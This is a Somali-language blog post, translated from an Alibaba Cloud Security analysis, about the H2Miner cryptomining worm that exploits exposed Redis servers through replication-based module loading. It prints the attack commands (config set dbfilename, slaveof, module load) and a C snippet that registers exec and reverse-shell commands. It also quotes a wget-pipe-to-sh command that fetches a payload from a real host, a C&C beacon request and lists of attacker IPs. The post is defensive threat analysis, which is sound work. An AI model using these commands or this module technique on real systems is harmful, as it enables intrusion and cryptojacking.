ProHoster > Блог > Maamulka > Dilaac cusub oo ah gooryaanka H2Miner ayaa la ogaaday kaasoo ka faa'iidaysanaya Redis RCE

Dilaac cusub oo ah gooryaanka H2Miner ayaa la ogaaday kaasoo ka faa'iidaysanaya Redis RCE

Maalin ka hor, mid ka mid ah adeegayaasha mashruucayga ayaa waxaa soo weeraray dixiri la mid ah. Isaga oo raadinaya jawaabta su'aasha "waa maxay taasi?" Waxaan ka helay maqaal weyn kooxda Alibaba Cloud Security. Maadaama aanan maqaalkan ka helin Habré, waxaan go'aansaday inaan kuu turjumo adiga <3

entry

Dhawaan, kooxda amniga ee Alibaba Cloud waxay ogaadeen inuu si lama filaan ah u dillaacay H2Miner. Noocan dixirigu xaasidnimada leh wuxuu u adeegsadaa la'aanta oggolaansho ama furaha sirta ah ee daciifka ah ee Redis sida albaabbada nidaamyadaaga, ka dib markaa waxay la midaysaa cutubkeeda xaasidnimada leh addoonka iyada oo loo marayo wada-shaqaynta sayid-addoon oo ugu dambeyntii soo dejisanaysa cutubkan xaasidnimada ah mashiinka la weeraray oo wuxuu fuliyaa xaasidnimo. tilmaamo.

Waagii hore, weerarrada nidaamyadaaga waxaa ugu horreyn lagu fulin jiray iyadoo la adeegsanayo hab ku lug leh hawlo la qorsheeyay ama furayaasha SSH oo lagu qoray mashiinkaaga ka dib markii uu weeraryahanku galo Redis. Nasiib wanaag, habkan lama isticmaali karo inta badan sababtoo ah dhibaatooyinka xakamaynta oggolaanshaha ama noocyada nidaamka kala duwan awgeed. Si kastaba ha ahaatee, habkan loo raray module xaasidnimo ah ayaa si toos ah u fulin kara amarada weerarka ama heli kara qolofka, kaas oo khatar ku ah nidaamkaaga.

Sababtoo ah tirada badan ee server-yada Redis ee lagu hayo internetka (ku dhawaad ​​1 milyan), kooxda amniga ee Alibaba Cloud, oo ah xasuusin saaxiibtinimo, waxay ku talineysaa in isticmaalayaashu aysan la wadaagin Redis online oo ay si joogto ah u hubiyaan xoogga sirtahooda iyo haddii ay wax u dhaceen. doorasho degdeg ah.

H2Miner

H2Miner waa botnet-ka macdanta ee nidaamyada ku salaysan Linux kaas oo ku soo duuli kara nidaamkaaga siyaabo kala duwan, oo ay ku jiraan oggolaansho la'aanta Hadoop yarn, Docker, iyo Redis Redis Command Execution (RCE) nuglaanta. Botnet-ku wuxuu u shaqeeyaa isagoo soo dejinaya qoraallada xaasidnimada leh iyo malware-ka si uu u soo saaro xogtaada, u ballaariyo weerarka si toos ah, oo uu ilaaliyo amarka iyo xakamaynta (C&C) isgaarsiinta.

Redis RCE

Aqoonta mawduucan waxaa la wadaagay Pavel Toporkov at ZeroNights 2018. Ka dib nooca 4.0, Redis waxay taageertaa habka rakibaadda plug-ka kaas oo siinaya dadka isticmaala awoodda inay ku shubaan si faylasha lagu soo ururiyo C galay Redis si ay u fuliyaan amarrada Redis gaar ah. Shaqadan, in kasta oo faa'iido leh, waxay ka kooban tahay nuglaanshaha, taas oo, qaabka addoon-doonka, faylasha lagu dhejin karo addoonka iyada oo loo marayo qaabka buuxa. Tan waxaa isticmaali kara weeraryahan si uu u gudbiyo faylalka xaasidnimada leh. Ka dib wareejinta la dhammeeyo, weeraryahanadu waxay ku shubaan moduleka tusaale ahaan Redis ee la weeraray oo waxay fuliyaan amar kasta.

Falanqaynta Gooryaanka Malware

Dhawaan, kooxda amniga ee Alibaba Cloud waxay ogaadeen in xajmiga kooxda macdanta H2Miner ay si lama filaan ah u korodhay. Marka loo eego falanqaynta, habka guud ee dhacdooyinka weerarku waa sida soo socota:

Dilaac cusub oo ah gooryaanka H2Miner ayaa la ogaaday kaasoo ka faa'iidaysanaya Redis RCE

H2Miner waxay u isticmaashaa RCE Redis weerar buuxa. Weeraryahanadu waxay marka hore weeraraan server-yada Redis-ka ee aan la ilaalin ama adeegayaasha leh furaha sirta ah ee daciifka ah.

Kadibna waxay adeegsadaan amarka config set dbfilename red2.so si loo beddelo magaca faylka. Taas ka dib, weeraryahanadu waxay fuliyaan amarka slaveof si loo dejiyo cinwaanka martigeliyaha ku celcelinta sayid-addoon.

Marka tusaalaha Redis ee la weeraray uu sameeyo xiriir sayid-addoon ah Redis xaasidnimo ah oo uu leeyahay qofka weerarka geystay, weeraryahanku wuxuu soo diraa cutubka cudurka qaba isagoo isticmaalaya amarka buuxa si uu u waafajiyo faylalka. Faylka red2.so ayaa markaa lagu soo dejin doonaa mishiinka la weeraray. Weeraryahanadu waxay markaa adeegsadaan moduleka ./red2.so loading si ay ugu shubaan faylkan. Module-ku waxa uu fulin karaa amarada ka imanaya qofka weerarka soo qaaday ama waxa uu bilaabi karaa isku xirka dambe (albaabka dambe) si uu u galo mishiinka la weeraray.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Kadib fulinta amar xaasidnimo ah sida / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, Weeraryahanku wuxuu dib u dajin doonaa magaca faylka kaydka ah wuxuuna soo dejin doonaa nidaamka nidaamka si uu u nadiifiyo raadadka. Si kastaba ha ahaatee, faylka red2.so ayaa wali ku sii jiri doona mashiinka la weeraray. Isticmaalayaasha waxaa lagula talinayaa inay fiiro gaar ah u yeeshaan joogitaanka faylka shakiga leh ee ku jira faylka tusaale ahaan Redis.

Marka laga soo tago in uu dilay qaar ka mid ah hababka xaasidnimada ah si uu u xado kheyraadka, weeraryahanku waxa uu raacay qoraal xaasidnimo ah isaga oo soo dejinaya oo fulinaya faylalka binary ee xaasidnimada ah 142.44.191.122 / qaraabo. Tani waxay ka dhigan tahay in magaca habka ama magaca hagaha ee ku jira qaraabada martida loo yahay ay muujin karto in mishiinka uu haleelay fayraskan.

Marka loo eego natiijooyinka injineernimada, malware-ku wuxuu inta badan qabtaa hawlaha soo socda:

  • Soo dejinta faylasha iyo fulinta
  • Macdanta
  • Joogteynta isgaarsiinta C&C iyo fulinta amarada weerarka

Dilaac cusub oo ah gooryaanka H2Miner ayaa la ogaaday kaasoo ka faa'iidaysanaya Redis RCE

U isticmaal masscan baarista dibadda si aad u ballaariso saameyntaada. Intaa waxaa dheer, ciwaanka IP-ga ee server-ka C & C waa mid adag oo si adag loogu dhejiyay barnaamijka, martida la weeraray ayaa la xiriiri doonta server-ka isgaarsiinta C & C iyadoo la adeegsanayo codsiyada HTTP, halkaasoo zombie (server-ka la isku halleyn karo) lagu aqoonsaday madaxa HTTP.

Dilaac cusub oo ah gooryaanka H2Miner ayaa la ogaaday kaasoo ka faa'iidaysanaya Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Hababka kale ee weerarka

Dilaac cusub oo ah gooryaanka H2Miner ayaa la ogaaday kaasoo ka faa'iidaysanaya Redis RCE

Cinwaanada iyo isku xidhka uu isticmaalo dirxigu

/ qaraabo

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Talo

Marka hore, Redis waa in aan laga heli karin internetka oo waa in lagu ilaaliyaa sirta adag. Waxa kale oo muhiim ah in macaamiishu hubiyaan in aanu jirin faylka red2.so ee ku jira hagaha Redis iyo in aanu jirin "kinsing" magaca faylka/habraaca ee martida loo yahay.

Source: www.habr.com

Add a comment